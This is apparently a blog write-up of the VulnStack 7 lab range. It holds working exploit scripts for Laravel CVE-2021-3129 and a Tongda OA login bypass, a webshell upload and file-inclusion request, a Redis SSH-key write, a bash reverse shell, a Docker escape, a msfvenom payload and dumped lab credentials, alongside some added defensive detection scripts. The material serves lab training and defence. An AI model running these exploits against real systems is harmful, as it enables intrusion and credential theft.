VulnStack 7


I don't feel like revising, so I'll play through VulnStack 7 to relax and count it as today's study.

download

Environment setup

The whole range consists of five target machines (27.8 GB in total), spread across three network segments (from the official documentation):

To set up the VMs, add two virtual network adapters in VMware: VMnet8 and VMnet14. Set VMnet8 to the default NAT mode with the IP range 192.168.52.0/24, and set VMnet14 to host-only mode with the IP range 192.168.93.0/24, as shown in the figure below.

In practice my NAT network already used the 52 segment, so I changed it; 192.168.54.128 is now the "public" address of Web 1.

Configure the network adapters as follows:

  • Web 1 gets two adapters: one in bridged mode (or NAT), the other on VMnet8
  • Web 2 and PC 1 get two adapters: one on VMnet8, the other on VMnet14
  • DC and PC 2 get one adapter, on VMnet14

Since none of the targets start their services automatically, we need to configure them by hand:

Domain user information

The domain user accounts and passwords are:

  • Administrator:Whoami2021
  • whoami:Whoami2021
  • bunny:Bunny2021
  • moretz:Moretz2021
  • Ubuntu 1:
    • web:web2021
  • Ubuntu 2:
    • ubuntu:ubuntu
  • Tongda OA account:
    • admin:admin657260

Log in to each machine manually and start the services:

Web 1:

```bash
redis-server /etc/redis.conf
/usr/sbin/nginx -c /etc/nginx/nginx.conf
iptables -F
```

Web 2:

```bash
sudo service docker start
sudo docker start 8e172820ac78
```

PC 1:

Start Tongda OA:

```
C:\MYOA\bin\AutoConfig.exe
```

Note: the firewall has to be turned off here, and AutoConfig.exe must be run with administrator privileges.

Once everything is configured, let's start.

Attack

Scan 192.168.54.128 with fscan:

```
.\fscan.exe -h 192.168.54.128

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
[*] start port scan
192.168.54.128: [22 80 81 6379]
[*] alive ports len is :4
---------------------------------------------
[*] start vulscan
[*] WebTitle http://192.168.54.128:81 code:200 len:17474 title:Laravel
[+] InfoScan http://192.168.54.128:81 [Laravel]
[*] WebTitle http://192.168.54.128 code:502 len:584 title:502 Bad Gateway
[+] Redis 192.168.54.128:6379 unauthorized file:/home/web/dump.rdb
[+] Redis 192.168.54.128:6379 like can write /var/spool/cron/
[+] PocScan http://192.168.54.128:81 poc-yaml-laravel-cve-2021-3129
```

Both open ports, 81 and 6379, are flagged as vulnerable.

The Laravel CVE reminds me of the ez_laravel challenge from this year's Pengcheng Cup online round, which tortured me badly. This one is a known CVE, though, so I'll just find a Python script for it later. First, let's use the unauthenticated Redis access.

Procedure:

```
config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\n your public key"
save
```

But: permission denied:

The reason was that I had forgotten to start redis as root with sudo. After fixing that, write again:

Then `ssh root@192.168.54.128` logs in without a password.
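From the defender's side, everything that made this write possible is visible in redis.conf: no `requirepass`, a network-reachable `bind`, `protected-mode` off, `CONFIG` left enabled, and the service running as root. As an added example (not part of the original post), the script below audits a redis.conf text for exactly those settings; both configs are constructed samples, not the range's real files.

```python
import re

# Constructed sample resembling the weak setup on Web 1: no password,
# listening on all interfaces, protected mode off, CONFIG still available.
WEAK_CONF = """
bind 0.0.0.0
port 6379
protected-mode no
dir /home/web
dbfilename dump.rdb
"""

# Constructed sample of the same service after hardening.
HARDENED_CONF = """
bind 127.0.0.1
port 6379
protected-mode yes
requirepass <long-random-password>
rename-command CONFIG ""
rename-command SAVE ""
dir /var/lib/redis
dbfilename dump.rdb
"""


def parse_redis_conf(text):
    """Return (directive, args) pairs, skipping comments and blank lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        entries.append((parts[0].lower(), parts[1] if len(parts) > 1 else ""))
    return entries


def audit_redis_conf(text, running_as_root=False):
    """List the reasons this config lets an anonymous client run
    CONFIG SET dir / CONFIG SET dbfilename / SAVE to drop a file."""
    directives = {}
    renamed = set()
    for name, args in parse_redis_conf(text):
        if name == "rename-command":
            # "rename-command CONFIG \"\"" disables the command outright
            renamed.add(args.split()[0].upper() if args else "")
        else:
            directives.setdefault(name, []).append(args)

    findings = []
    if "requirepass" not in directives:
        findings.append("no requirepass: any client can run CONFIG/SAVE")
    binds = " ".join(directives.get("bind", []))
    if not binds or re.search(r"\b0\.0\.0\.0\b", binds):
        findings.append("bind missing or 0.0.0.0: reachable from the network")
    if directives.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode no: unauthenticated remote access allowed")
    if "CONFIG" not in renamed:
        findings.append("CONFIG not renamed/disabled: dir and dbfilename can be changed at runtime")
    if running_as_root:
        findings.append("running as root: SAVE can write /root/.ssh and /var/spool/cron")
    return findings


if __name__ == "__main__":
    for finding in audit_redis_conf(WEAK_CONF, running_as_root=True):
        print("[!]", finding)
    print("hardened findings:", audit_redis_conf(HARDENED_CONF))
```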

After getting root, ifconfig reveals the 52 segment. Upload fscan and scan it:

```
root@ubuntu:~# ./fscan -h 192.168.52.1-255

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
(icmp) Target 192.168.52.10 is alive
(icmp) Target 192.168.52.20 is alive
[*] Icmp alive hosts len is: 2
192.168.52.20:22 open
192.168.52.10:22 open
192.168.52.10:81 open
192.168.52.10:80 open
192.168.52.10:6379 open
192.168.52.20:8000 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle http://192.168.52.20:8000 code:200 len:17474 title:Laravel
[*] WebTitle http://192.168.52.10:81 code:200 len:17474 title:Laravel
[+] InfoScan http://192.168.52.20:8000 [Laravel]
[+] InfoScan http://192.168.52.10:81 [Laravel]
[*] WebTitle http://192.168.52.10 code:502 len:584 title:502 Bad Gateway
[+] Redis 192.168.52.10:6379 unauthorized file:/root/.ssh/authorized_keys
[+] Redis 192.168.52.10:6379 like can write /root/.ssh/
[+] Redis 192.168.52.10:6379 like can write /var/spool/cron/
[+] PocScan http://192.168.52.10:81 poc-yaml-laravel-cve-2021-3129
[+] PocScan http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129
```

Found 192.168.52.20 (.10 is this machine).

.20 also runs a Laravel service?

Check the nginx configuration:

```bash
cd /etc/nginx/conf.d
```

There is indeed a reverse proxy on port 81, so what we actually reach on port 81 is port 8000 of 192.168.52.20, and we can attack it directly.

But first, use frp to reach the 52 segment: start a SOCKS5 proxy on port 6002 of 192.168.54.129:

Through the SOCKS5 proxy we can reach the 52 segment.

Payload for CVE-2021-3129:

https://github.com/crisprss/Laravel_CVE-2021-3129_EXP/tree/main

```python
# -*- coding=utf-8 -*-
# Author : Crispr
import os
import requests
import sys

class EXP:
    # More phpggc gadget chains can be added here; testing showed RCE5 works
    __gadget_chains = {
        "monolog_rce5": r"""
php -d "phar.readonly=0" ./phpggc Laravel/RCE5 "%s" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex (ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"
"""
    }

    def __vul_check(self):
        res = requests.get(self.__url, verify=False)
        if res.status_code != 405 and "laravel" not in res.text:
            print("[+]Vulnerability does not exist")
            return False
        return True

    def __payload_send(self, payload):
        header = {
            "Accept": "application/json"
        }
        data = {
            "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
            "parameters": {
                "variableName": "cve20213129",
                "viewFile": ""
            }
        }
        data["parameters"]["viewFile"] = payload
        res = requests.post(self.__url, headers=header, json=data, verify=False)
        return res

    def __clear_log(self):
        payload = "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
        return self.__payload_send(payload=payload)

    def __generate_payload(self, gadget_chain):
        generate_exp = self.__gadget_chains[gadget_chain] % self.__command
        # print(generate_exp)
        exp = "".join(os.popen(generate_exp).readlines()).replace("\n", "") + 'a'
        print("[+]exploit:")
        print(exp)
        return exp

    def __decode_log(self):
        return self.__payload_send(
            "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")

    def __unserialize_log(self):
        return self.__payload_send("phar://../storage/logs/laravel.log/test.txt")

    def __rce(self):
        text = str(self.__unserialize_log().text)
        # print(text)
        text = text[text.index(']'):].replace("}", "").replace("]", "")
        return text

    def exp(self):
        for gadget_chain in self.__gadget_chains.keys():
            print("[*] Try to use %s for exploitation." % (gadget_chain))
            self.__clear_log()
            self.__clear_log()
            self.__payload_send('A' * 2)
            self.__payload_send(self.__generate_payload((gadget_chain)))
            self.__decode_log()
            print("[*] Result:")
            print(self.__rce())

    def __init__(self, target, command):
        self.target = target
        self.__url = requests.compat.urljoin(target, "_ignition/execute-solution")
        self.__command = command
        if not self.__vul_check():
            print("[-] [%s] is seems not vulnerable." % (self.target))
            print("[*] You can also call obj.exp() to force an attack.")
        else:
            self.exp()

def main():
    EXP("http://127.0.0.1:8000", sys.argv[1])

if __name__ == "__main__":
    main()
```

Both are taken. If you prefer, you can also go through proxychains4 to attack .20, but it is very slow. Since it sits behind a reverse proxy, we can take the Laravel service on .20 through port 81 instead.
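On the defending side, the requests this exploit sends have a recognisable shape: POSTs to `_ignition/execute-solution` whose `viewFile` is a `php://filter/write=...` or `phar://` path aimed at `storage/logs/laravel.log`. The example below is added here (it is not from the exploit's author or the original post) and flags that sequence in constructed request records; it assumes a WAF or application log that keeps the JSON body.

```python
import json
import re

SOLUTION_ENDPOINT = "/_ignition/execute-solution"
WRAPPER_RE = re.compile(r"^(php://filter|phar://)", re.IGNORECASE)
SOLUTION = "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution"


def _body(view_file, variable="cve20213129"):
    return json.dumps({"solution": SOLUTION,
                       "parameters": {"variableName": variable, "viewFile": view_file}})


# Constructed request records in the order the exploit above issues them,
# plus one benign use of the same endpoint from another source.
SAMPLE_REQUESTS = [
    {"src": "192.168.52.10", "method": "GET", "path": "/", "body": ""},
    {"src": "192.168.52.10", "method": "POST", "path": SOLUTION_ENDPOINT,
     "body": _body("php://filter/write=convert.iconv.utf-8.utf-16be|"
                   "convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|"
                   "convert.base64-decode/resource=../storage/logs/laravel.log")},
    {"src": "192.168.52.10", "method": "POST", "path": SOLUTION_ENDPOINT,
     "body": _body("AA")},
    {"src": "192.168.52.10", "method": "POST", "path": SOLUTION_ENDPOINT,
     "body": _body("phar://../storage/logs/laravel.log/test.txt")},
    {"src": "10.0.0.5", "method": "POST", "path": SOLUTION_ENDPOINT,
     "body": _body("resources/views/welcome.blade.php", variable="user")},
]


def classify_request(rec):
    """Return indicator strings for one record; an empty list means benign."""
    indicators = []
    if rec["method"].upper() != "POST" or not rec["path"].endswith(SOLUTION_ENDPOINT):
        return indicators
    indicators.append("ignition execute-solution called")  # debug endpoint exposed
    try:
        body = json.loads(rec["body"])
    except (ValueError, TypeError):
        return indicators
    view_file = str(body.get("parameters", {}).get("viewFile", ""))
    wrapper = WRAPPER_RE.match(view_file)
    if wrapper:
        indicators.append("stream wrapper in viewFile: " + wrapper.group(1).lower())
    if "laravel.log" in view_file:
        indicators.append("viewFile targets storage/logs/laravel.log")
    if "convert.base64-decode" in view_file or "quoted-printable" in view_file:
        indicators.append("php://filter write chain (log rewrite)")
    return indicators


def summarize(records):
    """Count, per source, requests with more than the bare endpoint hit;
    the exploit needs several such requests in a row against one host."""
    per_src = {}
    for rec in records:
        if len(classify_request(rec)) > 1:
            per_src[rec["src"]] = per_src.get(rec["src"], 0) + 1
    return per_src


if __name__ == "__main__":
    for rec in SAMPLE_REQUESTS:
        print(rec["src"], rec["path"], classify_request(rec))
    print(summarize(SAMPLE_REQUESTS))
```

The route is only served while Ignition's debug mode is on, so the actual fix is `APP_DEBUG=false` in production plus updating facade/ignition to 2.5.2 or later.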

Then write a webshell:

Connect with AntSword.

Success. Continuing enumeration (note that we are now actually operating on the internal host 52.20), ipconfig does not work.

`ls -al /` reveals a .dockerenv file, so we are inside a Docker container. Let's try a Docker escape, but that requires root inside the container first, so we need to find a way to escalate privileges:

There is a /home/jobs/shell binary, and next to it we find demo.c:

```c
(www-data:/home/jobs) $ cat demo.c
#include<unistd.h>
void main()
{ setuid(0);
setgid(0);
system("ps");
}
```

It runs ps, but it runs it as root.

For the exploitation, see my own blog post: https://err0r233.github.io/posts/13343.html

```bash
echo "/bin/bash" > /tmp/ls
chmod 777 /tmp/ls
export PATH=/tmp:$PATH

# then run the test executable
```

That example used ls, so here we change it to ps:

```bash
echo "/bin/bash" > /tmp/ps
chmod 777 /tmp/ps
export PATH=/tmp:$PATH

# then run the test executable
```

Note that the environment we currently have is PHP's; to change the environment variables we need a reverse shell:

```bash
bash -c 'exec bash -i >& /dev/tcp/192.168.52.10/1337 0>&1'

# also learned here how to get a reverse shell from AntSword's terminal
```

Why use the Ubuntu box 52.10? Because the target is actually 52.20, which can only reach Web 1.

So we catch the shell on Web 1. Then run the shell:

There is no python3 in this environment, so we make do with this shell.

Next, check whether the container is privileged:

```
cat /proc/1/status | grep Cap
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
```

If `cat /proc/1/status | grep Cap` returns 0000003fffffffff, the container is probably privileged and an escape can be attempted.
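The Cap* lines are bitmasks, one bit per capability. The added example below (mine, not from the post) decodes them and applies the rule stated above: a bounding set that is contiguous from bit 0 and at least 38 bits wide is the full set of a privileged container. Both /proc/1/status samples are constructed; the second uses Docker's default capability set for comparison.

```python
# Linux capability names indexed by bit number (linux/capability.h).
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]

# Capabilities that by themselves are enough to break out of a container.
ESCAPE_CAPS = {"sys_admin", "sys_module", "sys_rawio", "sys_ptrace",
               "dac_read_search", "net_admin"}

# Constructed /proc/1/status excerpt with the values seen on 52.20 (privileged).
STATUS_PRIVILEGED = """\
Name:\tbash
CapInh:\t0000003fffffffff
CapPrm:\t0000003fffffffff
CapEff:\t0000003fffffffff
CapBnd:\t0000003fffffffff
CapAmb:\t0000000000000000
"""

# Constructed excerpt from a container started with Docker's default cap set.
STATUS_DEFAULT = """\
Name:\tbash
CapInh:\t0000000000000000
CapPrm:\t00000000a80425fb
CapEff:\t00000000a80425fb
CapBnd:\t00000000a80425fb
CapAmb:\t0000000000000000
"""


def parse_cap_fields(status_text):
    """Map each Cap* field of a /proc/<pid>/status dump to its integer mask."""
    caps = {}
    for line in status_text.splitlines():
        if line.startswith("Cap") and ":" in line:
            key, value = line.split(":", 1)
            caps[key.strip()] = int(value.strip(), 16)
    return caps


def decode_caps(mask):
    """Return the capability names whose bit is set in mask."""
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]


def assess_container(status_text):
    """Decode the effective set and decide whether the bounding set is the
    full set: contiguous from bit 0 and at least 38 bits (0x3fffffffff)."""
    caps = parse_cap_fields(status_text)
    effective = decode_caps(caps.get("CapEff", 0))
    bnd_mask = caps.get("CapBnd", 0)
    # m & (m + 1) == 0 holds exactly when m is 2**k - 1, i.e. bits 0..k-1 all set
    full_bounding = (bnd_mask & (bnd_mask + 1)) == 0 and bnd_mask.bit_length() >= 38
    return {
        "effective": effective,
        "dangerous": sorted(set(effective) & ESCAPE_CAPS),
        "likely_privileged": full_bounding,
    }


if __name__ == "__main__":
    for label, text in (("page sample", STATUS_PRIVILEGED), ("docker default", STATUS_DEFAULT)):
        result = assess_container(text)
        print(label, "privileged:", result["likely_privileged"],
              "dangerous:", result["dangerous"])
```

On the host the same condition shows up as `Privileged: true` in `docker inspect`; from inside the container, the capability mask is the signal to look for.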

```bash
fdisk -l
```

Still our old friend sda1:

```
Disk /dev/sda: 10 GiB, 10737418240 bytes, 20971520 sectors
Disk model: VMware Virtual S
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00063af9

Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 16779263 16777216 8G 83 Linux
/dev/sda2 16781310 20969471 4188162 2G 5 Extended
/dev/sda5 16781312 20969471 4188160 2G 82 Linux swap / Solaris
```

Next, repeat the steps from VulnStack 4; checking reveals an ubuntu user.

Then write our key in:

```bash
cp -avx test/home/ubuntu/.ssh/id_rsa.pub test/home/ubuntu/.ssh/authorized_keys # -avx copies the permissions along with the file
echo > test/home/ubuntu/.ssh/authorized_keys # empty the authorized_keys file
echo 'contents of the generated .pub file' > test/home/ubuntu/.ssh/authorized_keys # write the ssh public key into authorized_keys
```

Then log in to 52.20 through proxychains4.

As expected, something had to go wrong: I could not log in to this machine at all. So the only option left is to crack /etc/shadow:

```
ubuntu:$1$xJbww$Yknw8dsfh25t02/g2fM9g/:18281:0:99999:7:::
```

This hash has actually been cracked before: the password is ubuntu.

Just connect with ubuntu/ubuntu; after logging in, `sudo -i` gives root:

Continuing:

```
inet addr:192.168.93.10
```

Because I had forgotten to turn off the firewall, the Tongda OA host at .30 could not be reached, so I redid this step. The new fscan results:

Tongda OA. Let's try the known Tongda OA vulnerabilities directly:

```python
'''
@Author : Sp4ce
@Date : 2020-03-17 23:42:16
@LastEditors : Sp4ce
@LastEditTime : 2020-04-22 16:24:52
@Description : Challenge Everything.
'''
import requests
from random import choice
import argparse
import json

USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]

headers = {}
proxies = {
    'http': f'socks5://192.168.54.129:6002',
    'https': f'socks5://192.168.54.129:6002'
}

def getV11Session(url):
    checkUrl = url + '/general/login_code.php'
    try:
        headers["User-Agent"] = choice(USER_AGENTS)
        res = requests.get(checkUrl, headers=headers, proxies=proxies)
        resText = str(res.text).split('{')
        codeUid = resText[-1].replace('}"}', '').replace('\r\n', '')
        print(codeUid)
        getSessUrl = url + '/logincheck_code.php'
        res = requests.post(
            getSessUrl, data={'CODEUID': '{' + codeUid + '}', 'UID': int(1)}, headers=headers, proxies=proxies)
        print(res.text)
        print('[+]Get Available COOKIE:' + res.headers['Set-Cookie'])
    except:
        print('[-]Something Wrong With ' + url)


def get2017Session(url):
    checkUrl = url + '/ispirit/login_code.php'
    try:
        headers["User-Agent"] = choice(USER_AGENTS)
        res = requests.get(checkUrl, headers=headers, proxies=proxies)
        resText = json.loads(res.text)
        codeUid = resText['codeuid']
        codeScanUrl = url + '/general/login_code_scan.php'
        res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int(
            1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'}, headers=headers, proxies=proxies)
        resText = json.loads(res.text)
        status = resText['status']
        if status == str(1):
            getCodeUidUrl = url + '/ispirit/login_code_check.php?codeuid=' + codeUid
            res = requests.get(getCodeUidUrl, proxies=proxies)
            print('[+]Get Available COOKIE:' + res.headers['Set-Cookie'])
        else:
            print('[-]Something Wrong With ' + url + ' Maybe Not Vulnerable ?')
    except:
        print('[-]Something Wrong With ' + url)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-v",
        "--tdoaversion",
        type=int,
        choices=[11, 2017],
        help="Target TongDa OA Version. e.g: -v 11、-v 2017")
    parser.add_argument(
        "-url",
        "--targeturl",
        type=str,
        help="Target URL. e.g: -url 192.168.2.1、-url http://192.168.2.1"
    )
    args = parser.parse_args()
    url = args.targeturl
    if 'http://' not in url:
        url = 'http://' + url
    if args.tdoaversion == 11:
        getV11Session(url)
    elif args.tdoaversion == 2017:
        get2017Session(url)
    else:
        parser.print_help()
```

The most common one is the Tongda OA unauthenticated (front-end) arbitrary login. Just run the exploit above; note that it is configured to go through the SOCKS5 proxy.

https://www.freebuf.com/vuls/257154.html

For the subsequent getshell step, try this:

```python
import requests

proxies = {
    'http': f'socks5://192.168.54.129:6002',
    'https': f'socks5://192.168.54.129:6002'
}
burp0_data = {
    "UPLOAD_MODE": "2",
    "P": "123",
    "DEST_UID": "1"
}
burp0_url = "http://192.168.52.30:8080/ispirit/im/upload.php"
cookies = {
    "PHPSESSID": "j0rn2m18dmneombpnu3t6klks2",
    "path": "/"
}
html = requests.post(burp0_url, cookies=cookies, data=burp0_data, files={"ATTACHMENT": ("jpg", open("D:\\lost and found\\CTF\\pcb线下\\Hacking8cms\\01-通达OA\\tdoa_getshell\\attachment.jpg", "rb"), "image/jpeg")}, proxies=proxies)
print(html.request.body)
print(html.text)
```

That is a Python script I wrote myself. The response:

```
+OK [vm]258@2412_62225625|jpg|0[/vm]
```

The shell's path is:

```
2412/62225625.jpg
```

File inclusion:

```http
POST /ispirit/interface/gateway.php HTTP/1.1
Host: 49.233.3.2:8888
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 69
Content-Type: application/x-www-form-urlencoded

json={"url":"/general/../../attach/im/2007/422124454.jpg"}&cmd=whoami
```

Done. Next, try to get a shell back to msf. Since the shell we wrote is a PHP shell, it is best to use a cmd command-line shell directly.

A junior classmate taught me this trick; it's great.

```bash
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 LHOST=192.168.54.129 -f psh-cmd
```

psh-cmd generates a PowerShell one-liner that can be run directly in the shell:

Remember to configure the proxy before using msf.

First gather some information:

```
load kiwi
creds_all
```

```
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Administrator WHOAMIANONY 56b0cd8b125c05 ab89b1295e69d3 2bc4124300a6a8f
055e2dd9e955f1 53dd7614c7a3a8 c0ca10891823d36
8034 0cec c64e4b3a40
PC1$ WHOAMIANONY 3e6a3d8c713b48 d8e1318a24c64b8
21eaa51aab25f5 fcc89dc8609b09a
2074 f50342bacf
bunny WHOAMIANONY 7de10bf327ef7f cc567d5556030b 3747632756191e3
2ac6ebe8776a15 7356ee4915ff09 350e53211c63f80
3feb 8c8f 4eb163638f

wdigest credentials
===================

Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator WHOAMIANONY Whoami2021
PC1$ WHOAMIANONY %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9M
Twmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrk
o+zfn@])/"$V6?sDZel=f>[ol;
bunny WHOAMIANONY Bunny2021

tspkg credentials
=================

Username Domain Password
-------- ------ --------
Administrator WHOAMIANONY Whoami2021
bunny WHOAMIANONY Bunny2021

kerberos credentials
====================

Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator WHOAMIANONY.ORG Whoami2021
bunny WHOAMIANONY.ORG Bunny2021
pc1$ whoamianony.org %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yv
w.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5
A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
pc1$ WHOAMIANONY.ORG %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yv
w.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5
A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
```

hashdump:

```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```

ipconfig:

```
